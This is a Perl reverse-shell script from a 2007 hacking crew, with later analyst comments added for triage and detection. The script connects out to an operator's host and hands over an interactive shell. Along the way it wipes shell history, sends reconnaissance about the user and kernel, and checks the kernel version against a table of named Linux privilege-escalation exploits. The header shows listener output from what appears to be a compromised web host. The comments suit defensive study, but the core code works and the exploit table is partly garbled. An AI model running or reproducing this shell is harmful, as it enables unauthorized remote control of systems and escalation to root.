#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# 3sk0rbut0@gmail.com
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA
# ******* ConnectBack Shell *******
# Linux version 2.6.9-022stab078.14-smp (root@kern268.build.sw.ru) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest
# Kernel local:
# 2.6.9-022stab078.14-smp
# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$
use IO::Socket;
use Socket;
use FileHandle;
# Analyst note: this listing is an attacker-side "connect-back" (reverse) shell
# with a kernel-version-to-exploit lookup bolted on.  The comments below describe
# what the code does as written so the script can be triaged; the code itself is
# untouched.  There is no `use strict`/`use warnings`, so $system, %h and the
# `$hsd_*` names further down are all package globals.
#
# Program run for the remote operator at the very end of the script (after
# busca and the `sh -i` session); a package global, not a lexical.
$system = '/bin/bash';
# Usage banner when no listener host is supplied: $ARGV[0] is the operator's
# host, $ARGV[1] the listener port.  Neither value is validated.
if(!$ARGV[0])
{
print "
BackConnect Shell - D.O.M TEAM
";
print "Usage: perl $0 [IPHOST] [NCPORT]
";
print "Example: perl $0 82.85.55.21 6850
";
exit;
}
# Outbound TCP connection from the host running this script to the operator's
# listener.  Nothing listens on the local side, which is why inbound-only
# firewalling does not see this and egress monitoring / outbound connection
# logging is the relevant control.  Bareword handle SOCKET (legacy style).
# `die print ...` prints the message and then dies with print's return value,
# so the actual die text is "1 at <script> line N" rather than the message.
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido
";
# Port from $ARGV[1], host from $ARGV[0] (inet_aton accepts an IP or a name).
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket
";
# These four status lines go to the local STDOUT, i.e. they are printed on the
# host running the script *before* STDOUT is redirected below; the listener
# never sees them.  (Spanish: "Connecting to ...", "Sending shell", "Connected".)
print "[+] BackConnect Shell
";
print "[+] Conectando a $ARGV[0]...
";
print "[+] Enviando Shell...
";
print "[+] Conectado.
";
# Method call on a bareword handle; works because IO::Socket/FileHandle are
# loaded above.  Disables output buffering on the socket.
SOCKET->autoflush();
# fd-level dup of the socket onto the three standard handles (Perl keeps fds
# 0-2 for STDIN/STDOUT/STDERR, so this is effectively dup2).  Every child
# started by system() below therefore inherits the TCP socket as its stdin,
# stdout and stderr.  Detection: a perl/sh process whose fds 0, 1 and 2 all
# point at the same socket (e.g. in /proc/<pid>/fd) is the classic
# reverse-shell indicator.  STDIN is opened with '>&' (write mode) but the
# underlying fd is a full-duplex socket, so children still read from it.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
# First output the listener receives (matches the banner in the header above).
print "
******* ConnectBack Shell *******
";
# String-form system(): runs through `sh -c`.  Unsetting HISTFILE/SAVEHIST is
# an anti-forensics step, but it only affects this one child shell — each
# system() call spawns a fresh shell and environment changes do not flow back
# into perl's %ENV — so the interactive `sh -i` started at the end of the file
# may still write shell history depending on the shell's defaults.  The rest
# is host/user reconnaissance sent to the operator.
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");
# Rootkernel
# Running kernel release string (e.g. "2.6.9-022stab078.14-smp"); used by busca
# as the subject of a prefix match against the version lists below.
my $khost = `uname -r`;
chomp($khost);
print "
Kernel local: $khost
";
# Lookup table: exploit name -> list of kernel version prefixes.  %h is the hash
# busca iterates, but in this listing the assignments below are mangled
# (`$hsd_'name'` — note that `'` is Perl's legacy package separator), so as
# written they do not populate %h and busca has nothing to iterate.  The names
# (h00lyshit, krad3, ptrace_kmod, prctl, ...) are 2003-2007-era Linux local
# privilege-escalation tools; as strings they are useful as file-name /
# log-search indicators when triaging a host where this script was found.
my %h;
$hsd_'w00t' = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$hsd_'brk' = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$hsd_'ave' = { vuln=>['2.4.19','2.4.20'] };
$hsd_'elflbl' = { vuln=>['2.4.29'] };
$hsd_'elfdump' = { vuln=>['2.4.27'] };
$hsd_'expand_stack' = { vuln=>['2.4.29'] };
$hsd_'h00lyshit' = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$hsd_'kdump' = { vuln=>['2.6.13'] };
$hsd_'km2' = { vuln=>['2.4.18','2.4.22'] };
$hsd_'krad' = { vuln=>['2.6.11'] };
$hsd_'krad3' = { vuln=>['2.6.11','2.6.9'] };
$hsd_'local26' = { vuln=>['2.6.13'] };
$hsd_'loko' = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$hsd_'mremap_pte' = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$hsd_'newlocal' = { vuln=>['2.4.17','2.4.19'] };
$hsd_'ong_bak' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace' = { vuln=>['2.2.24','2.4.22'] };
$hsd_'ptrace_kmod' = { vuln=>['2.4.','2.6.'] };
$hsd_'ptrace24' = { vuln=>['2.4.9'] };
$hsd_'pwned' = { vuln=>['2.4.','2.6.'] };
$hsd_'py2' = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$hsd_'raptor_prctl' = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$hsd_'prctl3' = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$hsd_'remap' = { vuln=>['2.4.'] };
$hsd_'rip' = { vuln=>['2.2.'] };
$hsd_'stackgrow2' = { vuln=>['2.4.29','2.6.10'] };
$hsd_'uselib24' = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$hsd_'newsmp' = { vuln=>['2.6.'] };
$hsd_'smpracer' = { vuln=>['2.4.29'] };
$hsd_'loginx' = { vuln=>['2.4.22'] };
$hsd_'exp.sh' = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$hsd_'prctl' = { vuln=>['2.6.'] };
$hsd_'kmdx' = { vuln=>['2.6.','2.4.'] };
# Legacy `&name;` call form (passes the caller's @_, empty here).  The sub is
# defined further down; that is fine because subs are compiled before runtime.
&busca;
# Prints "P0sible 3xploit: <name>" for every table entry whose kernel-version
# prefix matches the running kernel.  Reads the file-scoped lexicals %h and
# $khost declared above (no arguments, no return value — output only).  In this
# listing %h is never populated (the `$hsd_*` assignments above are mangled),
# so the outer loop runs zero times; the sample output in the file header shows
# what a working copy emitted.
sub busca {
foreach my $key(keys %h){
# The dereference expression here is garbled in this listing; it was
# presumably meant to read the 'vuln' list of the current table entry.
foreach my $kernel ( @sd_ $hsd_$key{'vuln' } ){
# $kernel is interpolated unescaped, so the '.' characters in entries such as
# "2.6." are regex wildcards, and the pattern is anchored only at the start —
# the match is a loose prefix check, not an exact version comparison.
if($khost=~/^$kernel/){
# Operates on the loop's copy of the list element and the value is not used
# afterwards, so this line has no observable effect.  (/.$/ matches any
# non-empty string, so the condition is effectively always true.)
chop($kernel) if ($kernel=~/.$/);
print "P0sible 3xploit: ". $key ."
";
}
}
}
}
# Blank line to the listener, then the interactive session.
print "
";
# `exec sh -i` replaces the `sh -c` wrapper, so the process tree is
# perl -> sh -i, with the TCP socket as the shell's stdin/stdout/stderr and no
# controlling terminal — that is what produces the "sh: no job control in this
# shell" line shown in the header.  Detection: an interactive shell whose parent
# is perl and whose stdio is a socket rather than a pty.
system 'export TERM=xterm;exec sh -i';
# Fallback: once the `sh -i` session ends, /bin/bash ($system) is started on
# the same socket; if the operator has already disconnected it simply reads
# EOF and exits.
system($system);
__END__